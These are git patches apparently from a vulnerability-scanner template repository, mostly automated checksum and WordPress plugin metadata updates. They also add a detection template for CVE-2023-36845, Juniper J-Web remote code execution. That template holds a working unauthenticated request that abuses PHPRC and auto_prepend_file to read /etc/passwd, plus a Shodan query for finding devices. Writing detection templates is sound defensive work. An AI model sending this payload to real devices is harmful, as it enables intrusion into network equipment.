+  tags: cve,cve2023,weaver,eoffice,exposure
 
 http:
   - method: GET
@@ -24,5 +30,5 @@ http:
         dsl:
           - 'status_code == 200'
           - 'contains(header,"text/plain")'
-          - 'contains(body,"sdbuser") && contains(body, "sdbpassword")'
+          - 'contains_all(body, "sdbuser =","sdbpassword =")'
         condition: and

From 965fcd9d99c952c71cedb341319ae81bcb1511ac Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 18:21:28 +0000
Subject: [PATCH 0442/1090] Auto Generated New Template Addition List [Mon Sep
 18 18:21:28 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index f9bf1478af..f349d4b6e1 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1 +1,2 @@
+http/cves/2023/CVE-2023-2766.yaml
 http/exposures/tokens/jotform/jotform-api-key.yaml

From 309926e63d3378dd1f1e14326716f9af0cec4912 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 18:21:32 +0000
Subject: [PATCH 0443/1090] Auto Generated Templates Checksum [Mon Sep 18
 18:21:32 UTC 2023] :robot:

---
 templates-checksum.txt | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 956df6f9f8..4c3830f2f0 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2564,6 +2564,7 @@ http/cves/2023/CVE-2023-27372.yaml:cde7df7bfe8984d7e6d22b982e923a5c66ddb80a
 http/cves/2023/CVE-2023-27482.yaml:23bbd5fcacb14714176d7faef595a0e528477a50
 http/cves/2023/CVE-2023-27524.yaml:da8a83a2990af4b19c6f42fe411998a0b6cc6bb1
 http/cves/2023/CVE-2023-27587.yaml:a819235770f464cbe1cb532b57fe34c919a7ff56
+http/cves/2023/CVE-2023-2766.yaml:e39cc111218325601caaabb0699433321d621214
 http/cves/2023/CVE-2023-2780.yaml:db40792ff460986646151ea927034f5062b2c9f3
 http/cves/2023/CVE-2023-2796.yaml:b91a3cfc1eaf6a275aac33c7a58671633b3b6e12
 http/cves/2023/CVE-2023-28121.yaml:d2293698e26589be232d165d0739ad8349f5ad29
@@ -7180,7 +7181,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:94a712cdc5e70192f505d6c4cb513b68d185c359
+templates-checksum.txt:e1f570c41e2b71bf52d0d5f6bde7f87bfbc5f051
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 4dc094fffa6a84a045f2590ed3b798d6797ad0b6 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Tue, 19 Sep 2023 07:24:05 +0530
Subject: [PATCH 0444/1090] Create CVE-2023-36845.yaml

---
 http/cves/2023/CVE-2023-36845.yaml | 52 ++++++++++++++++++++++++++++++
 1 file changed, 52 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-36845.yaml

diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml
new file mode 100644
index 0000000000..aea29fd87a
--- /dev/null
+++ b/http/cves/2023/CVE-2023-36845.yaml
@@ -0,0 +1,52 @@
+id: CVE-2023-36845
+
+info:
+  name: Juniper J-Web - Remote Code Execution
+  author: yaser_s
+  severity: medium
+  description: |
+    A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands
+  reference:
+    - https://vulncheck.com/blog/juniper-cve-2023-36845
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-36845
+    - https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2023-36845
+    cwe-id: CWE-473
+    epss-score: 0.00046
+    epss-percentile: 0.14237
+    cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: juniper
+    product: junos
+    shodan-query: title:"Juniper Web Device Manager"
+  tags: cve,cve2023,rce,unauth,juniper
+
+http:
+  - raw:
+      - |
+        POST /?PHPRC=/dev/fd/0 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        auto_prepend_file="/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: word
+        part: body
+        words:
+          - "Juniper"
+
+      - type: status
+        status:
+          - 200

From a9be84a013765715dfd1d5d2acfffba1cc652f79 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 19 Sep 2023 04:02:07 +0000
Subject: [PATCH 0445/1090] Auto WordPress Plugins Update [Tue Sep 19 04:02:07
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/pretty-link.txt                       | 2 +-
 helpers/wordpress/plugins/table-of-contents-plus.txt            | 2 +-
 helpers/wordpress/plugins/wp-optimize.txt                       | 2 +-
 helpers/wordpress/plugins/wp-statistics.txt                     | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml            | 1 -
 http/technologies/wordpress/plugins/add-to-any.yaml             | 1 -
 http/technologies/wordpress/plugins/admin-menu-editor.yaml      | 1 -
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
 http/technologies/wordpress/plugins/akismet.yaml                | 1 -
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml         | 1 -
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml    | 1 -
 .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 -
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml  | 1 -
 http/technologies/wordpress/plugins/amp.yaml                    | 1 -
 http/technologies/wordpress/plugins/antispam-bee.yaml           | 1 -
 http/technologies/wordpress/plugins/astra-sites.yaml            | 1 -
 http/technologies/wordpress/plugins/astra-widgets.yaml          | 1 -
 http/technologies/wordpress/plugins/autoptimize.yaml            | 1 -
 http/technologies/wordpress/plugins/backwpup.yaml               | 1 -
 http/technologies/wordpress/plugins/better-search-replace.yaml  | 1 -
 http/technologies/wordpress/plugins/better-wp-security.yaml     | 1 -
 .../wordpress/plugins/black-studio-tinymce-widget.yaml          | 1 -
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml       | 1 -
 http/technologies/wordpress/plugins/breeze.yaml                 | 1 -
 http/technologies/wordpress/plugins/broken-link-checker.yaml    | 1 -
 .../wordpress/plugins/child-theme-configurator.yaml             | 1 -
 http/technologies/wordpress/plugins/classic-editor.yaml         | 1 -
 http/technologies/wordpress/plugins/classic-widgets.yaml        | 1 -
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml           | 1 -
 http/technologies/wordpress/plugins/cmb2.yaml                   | 1 -
 http/technologies/wordpress/plugins/coblocks.yaml               | 1 -
 http/technologies/wordpress/plugins/code-snippets.yaml          | 1 -
 http/technologies/wordpress/plugins/coming-soon.yaml            | 1 -
 http/technologies/wordpress/plugins/complianz-gdpr.yaml         | 1 -
 .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 -
 http/technologies/wordpress/plugins/contact-form-7.yaml         | 1 -
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml     | 1 -
 http/technologies/wordpress/plugins/cookie-law-info.yaml        | 1 -
 http/technologies/wordpress/plugins/cookie-notice.yaml          | 1 -
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml     | 1 -
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml    | 1 -
 http/technologies/wordpress/plugins/custom-css-js.yaml          | 1 -
 http/technologies/wordpress/plugins/custom-fonts.yaml           | 1 -
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml    | 1 -
 http/technologies/wordpress/plugins/disable-comments.yaml       | 1 -
 http/technologies/wordpress/plugins/disable-gutenberg.yaml      | 1 -
 http/technologies/wordpress/plugins/duplicate-page.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicate-post.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicator.yaml             | 1 -
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml      | 1 -
 http/technologies/wordpress/plugins/easy-fancybox.yaml          | 1 -
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/elementor.yaml              | 1 -
 http/technologies/wordpress/plugins/elementskit-lite.yaml       | 1 -
 http/technologies/wordpress/plugins/enable-media-replace.yaml   | 1 -
 http/technologies/wordpress/plugins/envato-elements.yaml        | 1 -
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml  | 1 -
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml   | 1 -
 .../wordpress/plugins/facebook-for-woocommerce.yaml             | 1 -
 http/technologies/wordpress/plugins/fast-indexing-api.yaml      | 1 -
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml      | 1 -
 http/technologies/wordpress/plugins/flamingo.yaml               | 1 -
 http/technologies/wordpress/plugins/fluentform.yaml             | 1 -
 http/technologies/wordpress/plugins/font-awesome.yaml           | 1 -
 .../wordpress/plugins/force-regenerate-thumbnails.yaml          | 1 -
 http/technologies/wordpress/plugins/formidable.yaml             | 1 -
 http/technologies/wordpress/plugins/forminator.yaml             | 1 -
 http/technologies/wordpress/plugins/ga-google-analytics.yaml    | 1 -
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml    | 1 -
 .../wordpress/plugins/google-analytics-for-wordpress.yaml       | 1 -
 .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 -
 http/technologies/wordpress/plugins/google-site-kit.yaml        | 1 -
 .../wordpress/plugins/google-sitemap-generator.yaml             | 1 -
 http/technologies/wordpress/plugins/gtranslate.yaml             | 1 -
 http/technologies/wordpress/plugins/gutenberg.yaml              | 1 -
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
 .../wordpress/plugins/header-footer-code-manager.yaml           | 1 -
 .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 -
 http/technologies/wordpress/plugins/header-footer.yaml          | 1 -
 http/technologies/wordpress/plugins/health-check.yaml           | 1 -
 http/technologies/wordpress/plugins/hello-dolly.yaml            | 1 -
 http/technologies/wordpress/plugins/host-webfonts-local.yaml    | 1 -
 http/technologies/wordpress/plugins/imagify.yaml                | 1 -
 http/technologies/wordpress/plugins/imsanity.yaml               | 1 -
 .../wordpress/plugins/insert-headers-and-footers.yaml           | 1 -
 http/technologies/wordpress/plugins/instagram-feed.yaml         | 1 -
 .../wordpress/plugins/intuitive-custom-post-order.yaml          | 1 -
 http/technologies/wordpress/plugins/iwp-client.yaml             | 1 -
 http/technologies/wordpress/plugins/jetpack-boost.yaml          | 1 -
 http/technologies/wordpress/plugins/jetpack.yaml                | 1 -
 http/technologies/wordpress/plugins/kadence-blocks.yaml         | 1 -
 http/technologies/wordpress/plugins/kirki.yaml                  | 1 -
 http/technologies/wordpress/plugins/leadin.yaml                 | 1 -
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml        | 1 -
 http/technologies/wordpress/plugins/limit-login-attempts.yaml   | 1 -
 http/technologies/wordpress/plugins/litespeed-cache.yaml        | 1 -
 http/technologies/wordpress/plugins/loco-translate.yaml         | 1 -
 http/technologies/wordpress/plugins/loginizer.yaml              | 1 -
 http/technologies/wordpress/plugins/loginpress.yaml             | 1 -
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml       | 1 -
 http/technologies/wordpress/plugins/mailpoet.yaml               | 1 -
 http/technologies/wordpress/plugins/maintenance.yaml            | 1 -
 http/technologies/wordpress/plugins/mainwp-child.yaml           | 1 -
 http/technologies/wordpress/plugins/malcare-security.yaml       | 1 -
 http/technologies/wordpress/plugins/megamenu.yaml               | 1 -
 http/technologies/wordpress/plugins/members.yaml                | 1 -
 http/technologies/wordpress/plugins/meta-box.yaml               | 1 -
 http/technologies/wordpress/plugins/ml-slider.yaml              | 1 -
 http/technologies/wordpress/plugins/newsletter.yaml             | 1 -
 .../wordpress/plugins/nextend-facebook-connect.yaml             | 1 -
 http/technologies/wordpress/plugins/nextgen-gallery.yaml        | 1 -
 http/technologies/wordpress/plugins/ninja-forms.yaml            | 1 -
 http/technologies/wordpress/plugins/ocean-extra.yaml            | 1 -
 .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 -
 http/technologies/wordpress/plugins/one-click-demo-import.yaml  | 1 -
 http/technologies/wordpress/plugins/optinmonster.yaml           | 1 -
 http/technologies/wordpress/plugins/otter-blocks.yaml           | 1 -
 http/technologies/wordpress/plugins/password-protected.yaml     | 1 -
 http/technologies/wordpress/plugins/pdf-embedder.yaml           | 1 -
 .../wordpress/plugins/pinterest-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/pixelyoursite.yaml          | 1 -
 http/technologies/wordpress/plugins/polylang.yaml               | 1 -
 http/technologies/wordpress/plugins/popup-builder.yaml          | 1 -
 http/technologies/wordpress/plugins/popup-maker.yaml            | 1 -
 http/technologies/wordpress/plugins/post-smtp.yaml              | 1 -
 http/technologies/wordpress/plugins/post-types-order.yaml       | 1 -
 .../wordpress/plugins/premium-addons-for-elementor.yaml         | 1 -
 http/technologies/wordpress/plugins/pretty-link.yaml            | 1 -
 http/technologies/wordpress/plugins/really-simple-captcha.yaml  | 1 -
 http/technologies/wordpress/plugins/really-simple-ssl.yaml      | 1 -
 http/technologies/wordpress/plugins/redirection.yaml            | 1 -
 http/technologies/wordpress/plugins/redux-framework.yaml        | 1 -
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml  | 1 -
 http/technologies/wordpress/plugins/safe-svg.yaml               | 1 -
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml       | 1 -
 http/technologies/wordpress/plugins/sg-cachepress.yaml          | 1 -
 http/technologies/wordpress/plugins/sg-security.yaml            | 1 -
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml    | 1 -
 .../wordpress/plugins/shortpixel-image-optimiser.yaml           | 1 -
 .../wordpress/plugins/simple-custom-post-order.yaml             | 1 -
 http/technologies/wordpress/plugins/siteguard.yaml              | 1 -
 http/technologies/wordpress/plugins/siteorigin-panels.yaml      | 1 -
 http/technologies/wordpress/plugins/smart-slider-3.yaml         | 1 -
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml      | 1 -
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml  | 1 -
 http/technologies/wordpress/plugins/sucuri-scanner.yaml         | 1 -
 http/technologies/wordpress/plugins/svg-support.yaml            | 1 -
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
 http/technologies/wordpress/plugins/tablepress.yaml             | 1 -
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml   | 1 -
 http/technologies/wordpress/plugins/the-events-calendar.yaml    | 1 -
 http/technologies/wordpress/plugins/themeisle-companion.yaml    | 1 -
 http/technologies/wordpress/plugins/tinymce-advanced.yaml       | 1 -
 .../wordpress/plugins/translatepress-multilingual.yaml          | 1 -
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml        | 1 -
 .../technologies/wordpress/plugins/under-construction-page.yaml | 1 -
 http/technologies/wordpress/plugins/updraftplus.yaml            | 1 -
 http/technologies/wordpress/plugins/use-any-font.yaml           | 1 -
 http/technologies/wordpress/plugins/user-role-editor.yaml       | 1 -
 .../wordpress/plugins/velvet-blues-update-urls.yaml             | 1 -
 http/technologies/wordpress/plugins/w3-total-cache.yaml         | 1 -
 .../wordpress/plugins/webp-converter-for-media.yaml             | 1 -
 http/technologies/wordpress/plugins/webp-express.yaml           | 1 -
 .../wordpress/plugins/widget-importer-exporter.yaml             | 1 -
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml        | 1 -
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml        | 1 -
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml    | 1 -
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml           | 1 -
 http/technologies/wordpress/plugins/woocommerce-payments.yaml   | 1 -
 .../wordpress/plugins/woocommerce-paypal-payments.yaml          | 1 -
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml         | 1 -
 http/technologies/wordpress/plugins/woocommerce-services.yaml   | 1 -
 http/technologies/wordpress/plugins/woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/wordfence.yaml              | 1 -
 http/technologies/wordpress/plugins/wordpress-importer.yaml     | 1 -
 http/technologies/wordpress/plugins/wordpress-seo.yaml          | 1 -
 http/technologies/wordpress/plugins/worker.yaml                 | 1 -
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-file-manager.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-google-maps.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml    | 1 -
 http/technologies/wordpress/plugins/wp-migrate-db.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml     | 1 -
 http/technologies/wordpress/plugins/wp-optimize.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-pagenavi.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-reset.yaml               | 1 -
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-rollback.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-smushit.yaml             | 1 -
 http/technologies/wordpress/plugins/wp-statistics.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-super-cache.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-user-avatar.yaml         | 1 -
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml        | 1 -
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml         | 1 -
 http/technologies/wordpress/plugins/wpforms-lite.yaml           | 1 -
 http/technologies/wordpress/plugins/wps-hide-login.yaml         | 1 -
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml  | 1 -
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml            | 1 -
 204 files changed, 4 insertions(+), 204 deletions(-)

diff --git a/helpers/wordpress/plugins/pretty-link.txt b/helpers/wordpress/plugins/pretty-link.txt
index 80d13b7d9b..678fd88a33 100644
--- a/helpers/wordpress/plugins/pretty-link.txt
+++ b/helpers/wordpress/plugins/pretty-link.txt
@@ -1 +1 @@
-3.5.2
\ No newline at end of file
+3.5.3
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/table-of-contents-plus.txt b/helpers/wordpress/plugins/table-of-contents-plus.txt
index 1610a30cb2..0b39e14dfa 100644
--- a/helpers/wordpress/plugins/table-of-contents-plus.txt
+++ b/helpers/wordpress/plugins/table-of-contents-plus.txt
@@ -1 +1 @@
-2302
\ No newline at end of file
+2309
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/wp-optimize.txt b/helpers/wordpress/plugins/wp-optimize.txt
index 9e08064b39..e38a2f36a7 100644
--- a/helpers/wordpress/plugins/wp-optimize.txt
+++ b/helpers/wordpress/plugins/wp-optimize.txt
@@ -1 +1 @@
-3.2.18
\ No newline at end of file
+3.2.19
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt
index ecaaf9200e..64ecdb0934 100644
--- a/helpers/wordpress/plugins/wp-statistics.txt
+++ b/helpers/wordpress/plugins/wp-statistics.txt
@@ -1 +1 @@
-14.1.6.1
\ No newline at end of file
+14.1.6.2
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
-    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
-    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
-    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
-    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index ac77f4e5f5..f68ad2a6bf 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
-    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
-    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
-    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
-    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
-    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
-    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
-    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
-    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
